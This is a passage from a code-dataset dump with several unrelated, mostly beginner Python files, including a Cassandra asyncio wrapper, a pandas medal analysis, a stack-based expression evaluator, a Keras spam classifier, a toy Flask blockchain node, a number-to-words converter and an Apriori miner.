Session\n\nfrom types import MethodType # isort:skip\n\ntry:\n import asyncio\nexcept ImportError:\n import trollius as asyncio\n\n__version__ = '1.0.4'\n\n\ndef _asyncio_fut_factory(loop):\n try:\n return loop.create_future\n except AttributeError:\n return partial(asyncio.Future, loop=loop)\n\n\ndef _asyncio_result(self, fut, result):\n self._loop.call_soon_threadsafe(fut.set_result, result)\n\n\ndef _asyncio_exception(self, fut, exc):\n self._loop.call_soon_threadsafe(fut.set_exception, exc)\n\n\ndef execute_future(self, *args, **kwargs):\n cassandra_fut = self.execute_async(*args, **kwargs)\n\n asyncio_fut = self._asyncio_fut_factory()\n\n cassandra_fut.add_callbacks(\n partial(self._asyncio_result, asyncio_fut),\n partial(self._asyncio_exception, asyncio_fut),\n )\n\n return asyncio_fut\n\n\ndef aiosession(session, loop=None):\n assert isinstance(session, Session), 'provide cassandra.cluster.Session'\n\n if hasattr(session, '_asyncio_fut_factory'):\n raise RuntimeError('session is already patched by aiosession')\n\n if loop is None:\n loop = asyncio.get_event_loop()\n\n setattr(session, '_loop', loop)\n setattr(session, '_asyncio_fut_factory', _asyncio_fut_factory(loop=loop))\n\n if sys.version_info >= (3, 0):\n session._asyncio_result = MethodType(_asyncio_result, 
session)\n session._asyncio_exception = MethodType(_asyncio_exception, session)\n session.execute_future = MethodType(execute_future, session)\n else:\n session._asyncio_result = MethodType(_asyncio_result, session, Session)\n session._asyncio_exception = MethodType(_asyncio_exception, session, Session) # noqa\n session.execute_future = MethodType(execute_future, session, Session)\n\n return session\n","sub_path":"aiocassandra.py","file_name":"aiocassandra.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"332215305","text":"#Programa para calcular la serie n veces del numero 3\n#Lenguaje python version 3.6\n\nn = int (input('Introduzca numero: '))\nm = 3\nfor i in range(1,n+1):\n # print('Valor ',i,' de la Serie: ',m)\n #La siguiente sentencia imprime una linea horizontal\n print(m,end=', ')\n m= m + 3\n\n#Fin de archivo\n#***************************************************************************","sub_path":"serie_ciclo1.py","file_name":"serie_ciclo1.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"526224134","text":"# --------------\n#Importing header files\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#Path of the file\r\npath \r\ndata = pd.read_csv(path)\r\n\r\ndata.rename(columns = {'Total':'Total_Medals'} , inplace = True)\r\n\r\nprint(data.head(10))\r\n\r\n#Code starts here\r\n\n\n\n# --------------\n#Code starts here\r\n\r\ndata['Better_Event'] = np.where(data['Total_Summer']>data['Total_Winter'] ,'Summer','Winter')\r\n\r\ndata['Better_Event'] =np.where(data['Total_Summer'] ==data['Total_Winter'],'Both',data['Better_Event'])\r\n\r\nprint(data['Better_Event'])\r\n\r\nbetter_event = data['Better_Event'].value_counts().idxmax()\r\n\r\nprint(better_event)\n\n\n# --------------\n#Code starts here\r\n#print(data)\r\ntop_countries = data[['Country_Name','Total_Summer', 'Total_Winter','Total_Medals']]\r\n\r\n#print(top_countries)\r\n\r\ntop_countries.drop(top_countries.index[146], inplace = True)\r\nprint(top_countries)\r\n\r\ndef top_ten(top_countries, column_name):\r\n country_list = []\r\n top_countries = top_countries.nlargest(10,column_name)\r\n country_list = list(top_countries['Country_Name'])\r\n return country_list\r\n\r\ntop_10_summer = top_ten(top_countries,'Total_Summer')\r\ntop_10_winter = top_ten(top_countries,'Total_Winter')\r\ntop_10 = top_ten(top_countries,'Total_Medals')\r\n\r\ncommon = list(set(top_10_summer) & set(top_10_winter) & set(top_10))\r\nprint(common)\r\n\r\n\r\n\r\nprint(top_10_summer,top_10_winter,top_10)\n\n\n# --------------\n#Code starts here\r\n\r\nsummer_df = data[data['Country_Name'].isin(top_10_summer)]\r\n\r\n#print(summer_df)\r\n\r\nwinter_df = data[data['Country_Name'].isin(top_10_winter)]\r\n\r\n#print(winter_df)\r\n\r\ntop_df = data[data['Country_Name'].isin(top_10)]\r\nprint(top_df)\r\n\r\nplt.plot(data['Country_Name'] , data['Total_Summer'] , label = 'line 1')\r\nplt.plot(data['Country_Name'] , data['Total_Winter'],label = 'line 2')\r\nplt.plot(data['Country_Name'] , data['Total_Medals'],label = 'line 3')\n\n\n# --------------\n#Code starts here\r\n\r\n#summer_df['Golden_Ratio'] = round(summer_df['Gold_Summer']/summer_df['Total_Summer'], 2)\r\n\r\n#print(summer_df['Golden_Ratio'], summer_df)\r\n\r\n#summer_max_ratio = summer_df['Golden_Ratio'].idxmax()\r\n#summer_country_gold = 
summer_df.loc[23,'Country_Name']\r\n\r\n#print(summer_max_ratio, summer_country_gold)\r\n\r\nsummer_df['Golden_Ratio']=summer_df['Gold_Summer']/summer_df['Total_Summer'] \r\n\r\nsummer_max_ratio=max(summer_df['Golden_Ratio']) \r\nsummer_country_gold=summer_df.loc[summer_df['Golden_Ratio'].idxmax(),'Country_Name']\r\n\r\nprint(summer_max_ratio, summer_country_gold)\r\n\r\n\r\nwinter_df['Golden_Ratio']=winter_df['Gold_Winter']/winter_df['Total_Winter'] \r\n\r\nwinter_max_ratio=max(winter_df['Golden_Ratio']) \r\nwinter_country_gold=winter_df.loc[winter_df['Golden_Ratio'].idxmax(),'Country_Name']\r\n\r\nprint(winter_max_ratio, winter_country_gold)\r\n\r\n\r\n\r\ntop_df['Golden_Ratio']=top_df['Gold_Total']/top_df['Total_Medals'] \r\n\r\ntop_max_ratio=max(top_df['Golden_Ratio']) \r\ntop_country_gold=top_df.loc[top_df['Golden_Ratio'].idxmax(),'Country_Name']\r\n\r\nprint(top_max_ratio, top_country_gold)\r\n\r\n\r\n\n\n\n# --------------\n#Code starts here\r\ndata_1 = data.drop(data.index[len(data)-1])\r\n\r\ndata_1['Total_Points'] = 3*data_1['Gold_Total'] + 2*data_1['Silver_Total']+ 1*data_1['Bronze_Total']\r\n\r\n\r\nmost_points=max(data_1['Total_Points']) \r\nbest_country=data_1.loc[data_1['Total_Points'].idxmax(),'Country_Name']\r\n\r\nprint(most_points,best_country)\n\n\n# --------------\n#Code starts here\r\n\r\nbest = data[data['Country_Name'] == best_country]\r\n\r\n\r\nbest =best[['Gold_Total','Silver_Total', 'Bronze_Total']]\r\nprint(type(best))\r\n\r\nbest.plot(kind = 'bar')\r\n\r\nplt.xlabel(\"United States\")\r\nplt.ylabel(\"Medals Tally\")\r\nplt.xticks(rotation = 45)\n\n\n","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"202037513","text":"from django.conf.urls import url, include\n\nfrom apps.login.views import login, contentuser, contentuseruser\n\nurlpatterns = [\n #url(r'^qa', chamgePercemtage, name='chamgepercemtage'),\n url(r'^$', login, name='login'),\n url(r'^contentuser/memdex.html', contentuser, name='contentuser'), # For mentor\n url(r'^contentuser/userimdex.html', contentuseruser, name='contentuseruser'), #For Student\n \n #url(r'^contentuser/', include('apps.contentuser.urls'), name='login'),\n #url(r'^$', contentuser, name='contentuser'),\n]\n","sub_path":"hbpro/apps/login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"545576417","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Exercice 1 : Construction d'une pile de longueur finie\n# ======================================================\ndef creer_pile(n):\n return n*[None]\n \ndef est_vide(pile):\n for el in pile :\n if el != None :\n return False\n return True\n\ndef est_pleine(pile):\n return (not None in pile) \n\ndef empiler(pile,el):\n if est_pleine(pile):\n return None\n # On recherche le premier emplacement vide\n i=0\n while pile[i]!= None:\n i=i+1\n pile[i]=el\n\ndef depiler(pile):\n if est_vide(pile):\n return None\n # On recherche le premier emplacement vide\n if est_pleine(pile):\n l = len(pile)\n el = pile[l-1]\n pile[l-1]=None\n return el\n i=0\n while pile[i]!= None:\n i=i+1\n el = pile[i-1]\n pile[i-1]=None\n return el \n \ndef taille_pile(pile):\n return len(pile)\n# Exercice 2 : NPI\n# ================\ndef est_nombre(el):\n return type(el)==float or type(el)==int\n\ndef est_operation(el):\n return el in 
[\"+\",\"-\",\"*\",\"/\"]\n \ndef inverse(pile):\n pile2=creer_pile(taille_pile(pile))\n pile3=creer_pile(taille_pile(pile))\n while not (est_vide(pile)):\n empiler(pile2,depiler(pile))\n while not (est_vide(pile2)):\n empiler(pile3,depiler(pile2))\n while not (est_vide(pile3)):\n empiler(pile,depiler(pile3))\n\ndef operer(nb1,nb2,op):\n if op == \"+\":\n return nb1+nb2\n elif op == \"*\":\n return nb1*nb2\n \ndef evaluer(pile):\n inverse(pile)\n pile2=creer_pile(taille_pile(pile))\n while not est_vide(pile):\n el = depiler(pile)\n if est_nombre(el):\n empiler(pile2,el)\n elif est_operation(el) :\n empiler(pile2,operer(depiler(pile2),depiler(pile2),el))\n return depiler(pile2)\n \n \n \npile1=[1,2,\"+\",4,\"*\",3,\"+\"]\npile2=[1,2,\"+\",4,\"*\",-3,\"+\",5,\"+\"]\nprint(evaluer(pile2))","sub_path":"P_05_AlgorithmiqueProgrammation/02_Piles/TD_02/programmes/TD_02_XP.py","file_name":"TD_02_XP.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"604033040","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport random\nimport string\nimport numpy as np\nimport os\n\ncheckpoint_path = \"training_1/cp.ckpt\"\ncheckpoint_dir = os.path.dirname(checkpoint_path)\n\n\ncp_callback = tf.keras.callbacks.ModelCheckpoint(checkpoint_path,\n save_weights_only=True,\n verbose=1)\n\nletter_index = {}\nhm_lines = 10000000\n\ndef generate_spam():\n dict = get_letter_dict_reversed()\n with open(\"Spam.txt\", \"w\") as text_file:\n #10000 lines of spam\n for i in range(10000):\n line = \"\"\n for j in range(random.randint(1,256)):\n line += dict[random.randint(0,len(dict)-1)]\n text_file.write(line +'\\n')\n\ndef get_letter_dict():\n array_of_content = []\n with open('ascii.txt','r') as f:\n temp_array_of_content = [line.splitlines() for line in f]\n char_array = []\n index_array = []\n rows = len(temp_array_of_content)\n\n for i in range(rows):\n broken_line = list(temp_array_of_content[i][0])\n ascii_char = broken_line[len(broken_line)-1]\n char_array.append(ascii_char)\n current_index = \"\"\n\n for j in range(len(broken_line)-2):\n current_index += broken_line[j]\n index_array.append(current_index)\n\n dictOfWords = { char_array[k] : k for k in range(0, len(char_array) ) }\n\n return dictOfWords\n\ndef get_letter_dict_reversed():\n letter_index_temp = get_letter_dict()\n reverse_letter_index = dict([(value, key) for (key, value) in letter_index_temp.items()])\n return reverse_letter_index\n\ndef get_letter_dict_with_reserved():\n letter_index = get_letter_dict()\n letter_index = {k:(v+4) for k,v in letter_index.items()}\n letter_index[\"\"] = 0\n letter_index[\"\"] = 1\n letter_index[\"\"] = 2 # unknown\n letter_index[\"\"] = 3\n return letter_index\n\ndef get_letter_dict_with_reserved_reversed():\n letter_index_temp = get_letter_dict_with_reserved()\n reverse_letter_index = dict([(value, key) for (key, value) in letter_index_temp.items()])\n return reverse_letter_index\n\nreverse_letter_index = get_letter_dict_with_reserved_reversed()\nletter_index = get_letter_dict_with_reserved()\n\ndef decode(text):\n return ''.join([reverse_letter_index.get(i, 2) for i in text])\n\ndef encode(text):\n chars = list(text)\n return ([letter_index.get(i, 2) for i in chars])\n\ndef encode_contents(not_spam, spam):\n contents_of_file_encoded = []\n with open(not_spam,'r') as f:\n contents_of_file = [line.splitlines() for line in f]\n 
for i in range(len(contents_of_file)):\n contents_of_file_encoded.append(encode(contents_of_file[i][0]))\n\n with open(spam,'r') as g:\n contents_of_file = [line.splitlines() for line in g]\n for j in range(len(contents_of_file)):\n contents_of_file_encoded.append(encode(contents_of_file[j][0]))\n\n return contents_of_file_encoded\n\ndef encode_contents_single(file):\n contents_of_file_encoded = []\n with open(file,'r') as f:\n contents_of_file = [line.splitlines() for line in f]\n for i in range(len(contents_of_file)):\n contents_of_file_encoded.append(encode(contents_of_file[i][0]))\n return contents_of_file_encoded\n\ndef suffle_contents(spam_and_not, file1, file2):\n not_spam = encode_contents_single(file1)\n spam = encode_contents_single(file2)\n total_file_data = []\n for i in range(len(not_spam)):\n total_file_data.append(1)\n for j in range(len(spam)):\n total_file_data.append(0)\n\n test = (spam_and_not)\n rng_state = np.random.get_state()\n np.random.shuffle(test)\n np.random.set_state(rng_state)\n np.random.shuffle(total_file_data)\n\n return test, total_file_data\n\n\n\ndef create_test_data_and_labels():\n file_contents_encoded = encode_contents(\"NotSpam.txt\", \"Spam.txt\")\n\n data, labels = suffle_contents(file_contents_encoded, \"NotSpam.txt\", \"Spam.txt\")\n\n train_data_pre = data[:len(data)//2]\n test_data_pre = data[len(data)//2:]\n train_data = np.array(train_data_pre)\n test_data = np.array(test_data_pre)\n\n train_labels_pre = labels[:len(labels)//2]\n test_labels_pre = labels[len(labels)//2:]\n train_labels = np.array(train_labels_pre)\n test_labels = np.array(test_labels_pre)\n\n\n train_data = keras.preprocessing.sequence.pad_sequences(train_data,\n value=letter_index[\"\"],\n padding='post',\n maxlen=256)\n test_data = keras.preprocessing.sequence.pad_sequences(test_data,\n value=letter_index[\"\"],\n padding='post',\n maxlen=256)\n\n return train_data, test_data, train_labels, test_labels\n\n\ndef build_model():\n train_data, test_data, train_labels, test_labels = create_test_data_and_labels()\n vocab_size = len(get_letter_dict_with_reserved())\n\n model = tf.keras.models.Sequential([\n keras.layers.Embedding(vocab_size, 16),\n keras.layers.GlobalAveragePooling1D(),\n keras.layers.Dense(16, activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n ])\n\n model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['acc'])\n x_val = train_data[:10000]\n partial_x_train = train_data[10000:]\n\n y_val = train_labels[:10000]\n partial_y_train = train_labels[10000:]\n\n history = model.fit(partial_x_train,\n partial_y_train,\n epochs=40,\n batch_size=512,\n validation_data=(x_val, y_val),\n verbose=1,\n )\n\n results = model.evaluate(test_data, test_labels)\n\n model.fit(train_data, train_labels, epochs = 2,\n validation_data = (test_data,test_labels),\n callbacks = [cp_callback]) # pass callback to training\n\n print(results)\n return model\n\ndef create_default_model():\n vocab_size = len(get_letter_dict_with_reserved())\n model = tf.keras.models.Sequential([\n keras.layers.Embedding(vocab_size, 16),\n keras.layers.GlobalAveragePooling1D(),\n keras.layers.Dense(16, activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n ])\n model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['acc'])\n\n return model\n\ndef create_restored_model():\n train_data, test_data, train_labels, test_labels = create_test_data_and_labels()\n restore_model = create_default_model()\n 
restore_model.load_weights(checkpoint_path)\n loss,acc = restore_model.evaluate(test_data, test_labels)\n print(\"Restored model, accuracy: {:5.2f}%\".format(100*acc))\n return restore_model\n\ndef test_data_msg(message):\n #restore_model = create_restored_model()\n pre = np.array(encode(message))\n prediction = restore_model.predict(pre)\n\n decision = [\"Spam\", \"Not Spam\"]\n return decision[int(prediction[0][0])]\n\ndef train_model():\n model = build_model()\n\n#train_model()\nrestore_model = create_restored_model()\n#model.summary()\n\nprint(test_data_msg(\"!levels\"))\n","sub_path":"SpamClassification/spam_classification_ASCII.py","file_name":"spam_classification_ASCII.py","file_ext":"py","file_size_in_byte":7521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"243676448","text":"\nimport datetime\nfrom flask import Flask, jsonify, request\nimport hashlib\nimport json\nimport requests\nfrom uuid import uuid4\nfrom urllib.parse import urlparse\n# 1. create blockchain class\n\n\nclass Blockchain():\n def __init__(self):\n self.chain = []\n self.transactions = []\n self.create_block(prev_hash='0', proof=1)\n self.nodes = set()\n\n def create_block(self, prev_hash, proof):\n block = {'timestamp': str(datetime.datetime.now()),\n 'prev_hash': prev_hash,\n 'proof': proof,\n 'index': len(self.chain)+1,\n 'transactions': self.transactions}\n self.transactions = []\n self.chain.append(block)\n return block\n\n def get_prev_block(self):\n return self.chain[-1]\n\n def get_proof(self, prev_proof):\n #prev_proof = self.get_prev_block['proof']\n found = False\n proof = 1\n while(not found):\n # any non symmetric function with fair enough complexity\n hash_found = hashlib.sha256(\n str(proof**2-prev_proof**2).encode()).hexdigest()\n if(hash_found[:4] == '0000'):\n found = True\n else:\n proof = proof+1\n return proof\n\n def hash(self, block):\n # convert to json and sort to keys to get uniform hashing\n encoded_block = json.dumps(block, sort_keys=True).encode()\n return hashlib.sha256(encoded_block).hexdigest()\n\n def sanity_check(self):\n # 2 checks needed\n # 1. prev hash matches with current hash stored\n prev = self.chain[0]\n index = 1\n while(index < len(self.chain)):\n prev_hash = self.chain[index]['prev_hash']\n if(prev_hash != self.hash(prev)):\n return False\n # 2. proof of work is correct\n proof = self.chain[index]['proof']\n prev_proof = prev['proof']\n hash_found = hashlib.sha256(\n str(proof**2-prev_proof**2).encode()).hexdigest()\n if(hash_found[:4] != '0000'):\n found = False\n prev = self.chain[index]\n index += 1\n return True\n # transactions to make it cryptocurrency\n\n def add_transaction(self, amount, sender, receiver):\n self.transactions.append(\n {'sender': sender, 'receiver': receiver, 'amount': amount})\n prev_block = self.get_prev_block()\n return prev_block['index']+1\n\n def add_node(self, address):\n parsed_url = urlparse(address)\n self.nodes.add(parsed_url.netloc)\n # consesus to make all nodes have same chain\n\n def replace_nodes(self):\n network = self.nodes\n longest_chain = None\n max_len = len(self.chain)\n for node in network:\n response = requests.get(f'http://{node}/list_chain')\n if response.status_code == 200:\n length = response.json()['length']\n chain = response.json()['chain']\n if length > max_len and self.sanity_check():\n max_len = length\n longest_chain = chain\n if longest_chain:\n self.chain = longest_chain\n return True\n return False\n\n\n# 2. 
Actual working and mining\nblockchain = Blockchain()\n# Webapp\napp = Flask(__name__)\n# Create node addresses\nnode_addresses = str(uuid4()).replace('-', '')\n\n\n@app.route('/mine', methods=['GET'])\ndef mine():\n prev_block = blockchain.get_prev_block()\n proof = blockchain.get_proof(prev_block['proof'])\n block = blockchain.create_block(blockchain.hash(prev_block), proof)\n blockchain.add_transaction(\n sender=node_addresses, receiver='Alfred', amount=10)\n response = {'message': ' You did it! New block created',\n 'index': block['index'], 'timestamp': block['timestamp'], 'proof': block['proof'], 'prev_hash': block['prev_hash'], 'transactions': block['transactions']}\n return jsonify(response), 200\n\n\n@app.route('/list_chain', methods=['GET'])\ndef list_chain():\n response = {'chain': blockchain.chain, 'length': len(blockchain.chain)}\n return jsonify(response), 200\n\n\n@app.route('/sanity', methods=['GET'])\ndef sanity():\n valid = blockchain.sanity_check()\n if(valid):\n response = {'message': 'Blockchain is valid'}\n else:\n response = {'message': 'Sorry. Something went wrong!'}\n return jsonify(response), 200\n\n\n@app.route('/add_transaction', methods=['POST'])\ndef add_transaction():\n json = request.get_json()\n transaction_keys = {'sender', 'receiver', 'amount'}\n if not all(key in json for key in transaction_keys):\n return 'Missing keys', 400\n index = blockchain.add_transaction(\n json['sender'], json['receiver'], json['amount'])\n response = {'message': f'Transaction will be added to {index}'}\n return response, 201\n# 3. decentralizing blockchain\n\n# Create new nodes\n\n\n@app.route('/connect_node', methods=['POST'])\ndef connect_node():\n json = request.get_json()\n nodes = json.get('nodes')\n if nodes is None:\n return 'No node found', 400\n for node in nodes:\n blockchain.add_node(node)\n response = {'message': 'All nodes added successfully. Chain contains following nodes',\n 'total_nodes': list(blockchain.nodes)}\n return jsonify(response), 201\n\n# Replace all chains with most recent one\n\n\n@app.route('/update_chain', methods=['GET'])\ndef update_chain():\n is_chain_replaced = blockchain.replace_nodes()\n if(is_chain_replaced):\n response = {\n 'message': 'Nodes had different chians. 
Hence, Chain is replaced', 'new_chain': blockchain.chain}\n else:\n response = {'message': 'Chain is already updated',\n 'actual_chain': blockchain.chain}\n return jsonify(response), 200\n\n\napp.run(host='0.0.0.0', port=5002)\n","sub_path":"crypcoin_node_5002.py","file_name":"crypcoin_node_5002.py","file_ext":"py","file_size_in_byte":5873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"323866259","text":"from SpellCheckerTrainer import SpellCheckerTrainer\nimport sys\n\n\ncorpus = sys.argv[1]\nmodel = sys.argv[2]\nif len(sys.argv) == 5:\n algorithm = sys.argv[3]\n iterations = int(sys.argv[4])\nelse:\n algorithm = 'GIS'\n iterations = 30\n\nspt = SpellCheckerTrainer()\nspt.trainingClassifiers(corpus, model, algorithm, iterations)\n\n","sub_path":"TrainSpellCheck.py","file_name":"TrainSpellCheck.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"245741079","text":"def reg_test(reg, test_str):\n import re\n test_str_2 = \"'a25-49 (nbcu)'\"\n\n matches = re.finditer(reg, test_str, re.MULTILINE)\n\n for matchNum, match in enumerate(matches, start=1):\n\n print(\"Match {matchNum} was found at {start}-{end}: {match}\".format(matchNum=matchNum, start=match.start(),\n end=match.end(), match=match.group()))\n\n for groupNum in range(0, len(match.groups())):\n groupNum = groupNum + 1\n\n print(\"Group {groupNum} found at {start}-{end}: {group}\".format(groupNum=groupNum,\n start=match.start(groupNum),\n end=match.end(groupNum),\n group=match.group(groupNum)))\n\n","sub_path":"Classifier/tests/regex_string_test.py","file_name":"regex_string_test.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"624112132","text":"from re import split\n\n__SIGNS = {\n '-': 'minus', '+': 'plus', '*': 'times by',\n '/': 'divided by', '=': 'equals', '=-': 'equals minus'\n}\n__ONES = {\n '1': 'one', '2': 'two', '3': 'three', '4': 'four', '5': 'five',\n '6': 'six', '7': 'seven', '8': 'eight', '9': 'nine'\n}\n__TEENS = {\n '0': 'ten', '1': 'eleven', '2': 'twelve', '3': 'thirteen', '4': 'fourteen',\n '5': 'fifteen', '6': 'sixteen', '7': 'seventeen', '8': 'eighteen', '9': 'nineteen'\n}\n__TENS = {\n '2': 'twenty', '3': 'thirty', '4': 'forty', '5': 'fifty',\n '6': 'sixty', '7': 'seventy', '8': 'eighty', '9': 'ninety'\n}\n__HIGHER_POSITIONS = ['thousand', 'million', 'billion', 'trillion', 'quadrillion']\n\n\ndef humanize(expression):\n lexemes = parse(expression)\n if lexemes is None:\n return 'invalid input'\n return ' '.join(\n __SIGNS[lex] if lex in __SIGNS else interpret(lex) for lex in lexemes\n )\n\n\ndef parse(expression):\n if expression == '':\n return None\n lexemes = __split(expression)\n if lexemes[0] in __SIGNS:\n if not __check_from_start(lexemes):\n return None\n elif isnum(lexemes[0]):\n if not __check_signs(lexemes, 1):\n return None\n else:\n return None\n return lexemes\n\n\ndef __split(expression):\n return [lex for lex in split(\n r'(-|\\+|\\*|/|=-|=)', expression.replace(' ', '')\n ) if lex != '']\n\n\ndef isnum(lex):\n isdigit = lex.isdigit()\n return isdigit if len(lex) <= 1 else isdigit and lex[0] != '0'\n\n\ndef __check_from_start(lexemes):\n return len(lexemes) >= 2 and lexemes[0] == '-' and isnum(lexemes[1]) \\\n and lexemes[1] != '0' and __check_signs(lexemes, 2)\n\n\ndef __check_signs(lexemes, start):\n length = len(lexemes)\n for i in range(start, 
length, 2):\n if i + 1 == length or not isnum(lexemes[i + 1]) or \\\n lexemes[i] == '=-' and lexemes[i + 1] == '0':\n return False\n return True\n\n\ndef interpret(lexeme):\n if lexeme == '0':\n return 'zero'\n digits, trinities, length = lexeme[::-1], [], len(lexeme)\n for ones in range(0, length, 3):\n trinity, hundreds, tens = [], ones + 2, ones + 1\n if hundreds < length and digits[hundreds] != '0':\n trinity.append(f'{__ONES[digits[hundreds]]} hundred')\n if tens < length and int(digits[tens]) > 1:\n trinity.append(__TENS[digits[tens]])\n flag = tens < length and digits[tens] == '1'\n if not flag and digits[ones] != '0':\n trinity.append(__ONES[digits[ones]])\n if flag:\n trinity.append(__TEENS[digits[ones]])\n if len(trinity) > 0:\n if ones != 0:\n trinity.append(__HIGHER_POSITIONS[ones // 3 - 1])\n trinities.append(trinity)\n return ' '.join(pos for trin in trinities[::-1] for pos in trin)\n","sub_path":"humanizer.py","file_name":"humanizer.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"616318668","text":"import sys\nimport csv\nimport time\n\ndataset=sys.argv[1]\nmin_support=float(sys.argv[2])\nmin_confidence=float(sys.argv[3])\ntransactions=[]\nno_of_transactions=0\nitemset=[]\nitemset_support={}\nitemset_count={}\nfrequent_1itemset=[]\nitemset2=[]\nitemset2_support={}\nitemset2_count={}\nitemset2_confidence={}\nfrequent_2itemset=[]\nitemset3=[]\nitemset3_count={}\nitemset3_support={}\nitemset3_confidence={}\nfrequent_3itemset=[]\nrules=[]\ndef read_transactions():\n\twith open(dataset, newline='') as csvfile:\n spamreader = csv.reader(csvfile)\n '''for row in spamreader:\n transaction_row=[]\n for i in row:\n item=int(i)\n if item not in itemset:\n itemset.append(item)\n itemset_count[item]=1\n else:\n itemset_count[item]+=1\n transaction_row.append(item)\n transactions.append(transaction_row)'''\n for row in spamreader:\n transactions.append(row[:])\n\ndef generate_1itemset():\n for row in transactions:\n for item in row:\n if item not in itemset:\n itemset.append(item)\n itemset_count[item]=1\n else:\n itemset_count[item]+=1\n itemset.sort()\n for item in itemset:\n itemset_support[item]=float(itemset_count[item]/no_of_transaction)\n for item in itemset:\n if itemset_support[item] >= min_support:\n frequent_1itemset.append(item)\n\ndef generate_2itemset():\n\n\tfor item1 in frequent_1itemset:\n\t\tfor item2 in frequent_1itemset:\n\t\t\tif not item1==item2:\n\t\t\t\tif [item2,item1] not in itemset2:\n\t\t\t\t\titemset2.append([item1,item2])\n\t\t\t\t\titemset2_count[item1,item2]=0\n\tfor items in itemset2:\n\t\tfor row in transactions:\n\t\t\tif set(items).issubset(row):\n\t\t\t\t\titemset2_count[items[0],items[1]]+=1\n\tfor items in itemset2:\n\t\titemset2_support[items[0],items[1]]=float(itemset2_count[items[0],items[1]]/no_of_transaction)\n\t\titemset2_confidence[items[0],items[1]]=float(itemset2_count[items[0],items[1]]/itemset_count[items[0]])\n\tfor items in itemset2:\n\t\tif itemset2_support[items[0],items[1]] >= min_support:\n\t\t\tfrequent_2itemset.append(items)\n\t\tif itemset2_confidence[items[0],items[1]] >= min_confidence:\n tmp=items[0]+\"->\"+items[1]\n rules.append(tmp)\n\ndef generate_3itemset():\n\t'''for item1 in frequent_1itemset:\n\t\tfor item2 in frequent_1itemset:\n\t\t\tfor item3 in frequent_1itemset:\n print(\"checking: \",item1,\" \",item2,\" \",item3,[item1, item2] in frequent_2itemset and [item2, item3] in frequent_2itemset and [item3, item1] in 
frequent_2itemset)\n if [item1, item2] in frequent_2itemset and [item2, item3] in frequent_2itemset and [item3, item1] in frequent_2itemset:\n itemset3.append([item1, item2, item3])\n itemset3_count[item1, item2, item3]=0'''\n\tfor item in frequent_1itemset:\n\t\tfor items in frequent_2itemset:\n\t\t\titems3=[]\n\t\t\tif item not in items:\n\t\t\t\titems3=[item, items[0],items[1]]\n\t\t\t\titems3.sort()\n\t\t\t\titemset3.append(items3)\n\t\t\t\titemset3_count[items3[0],items3[1],items3[2]]=0\n\tfor items in itemset3:\n\t\tfor row in transactions:\n\t\t\tif set(items).issubset(row):\n\t\t\t\titemset3_count[items[0],items[1],items[2]]+=1\n\tfor items in itemset3:\n\t\titemset3_support[items[0],items[1],items[2]]=float(itemset3_count[items[0],items[1],items[2]]/no_of_transaction)\n\t\ttry:\n\t\t\tif not itemset2_count[items[0],items[1]]==0:\n\t\t\t\titemset3_confidence[items[0],items[1],items[2]]=float(itemset3_count[items[0],items[1],items[2]]/itemset2_count[items[0],items[1]])\n\t\texcept:\n\t\t\tif not itemset2_count[items[1],items[0]]==0:\n\t\t\t\titemset3_confidence[items[0],items[1],items[2]]=float(itemset3_count[items[0],items[1],items[2]]/itemset2_count[items[1],items[0]])\n\tfor items in itemset3:\n\t\tif itemset3_support[items[0],items[1],items[2]] >= min_support:\n\t\t\t#print([items[0],items[1],items[2]],itemset3_support[items[0],items[1],items[2]])\n\t\t\tfrequent_3itemset.append(items)\n\n\tfor items in itemset3_confidence:\n #if itemset3_confidence[items[0],items[1],items[2]] >= min_confidence:\n\t\tif itemset3_confidence[items] >= min_confidence:\n tmp=items[0]+\",\"+items[1]+\"->\"+items[2]\n rules.append(tmp)\n\n\nstart_time=time.time()\nread_transactions()\nno_of_transaction=len(transactions)\nprint(no_of_transaction)\n#print(transactions)\n\ngenerate_1itemset()\nprint(\"Frequent 1-itemset\")\nprint(frequent_1itemset)\n\ngenerate_2itemset()\nprint(\"Frequent 2-itemset\")\nprint(frequent_2itemset)\n\ngenerate_3itemset()\nprint(\"Frequent 3-itemset\")\n#print(frequent_3itemset)\n\nprint(\"rules generated: \", len(rules))\nprint(\"execution time: \", time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start_time)))\n","sub_path":"apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"139163357","text":"def read_adapters(file_location):\n \"\"\"Read file the code\n \"\"\"\n adapters = open(file_location, 'r').read().split('\\n')\n adapters = [int(entry) for entry in adapters if entry != '']\n adapters.sort()\n return 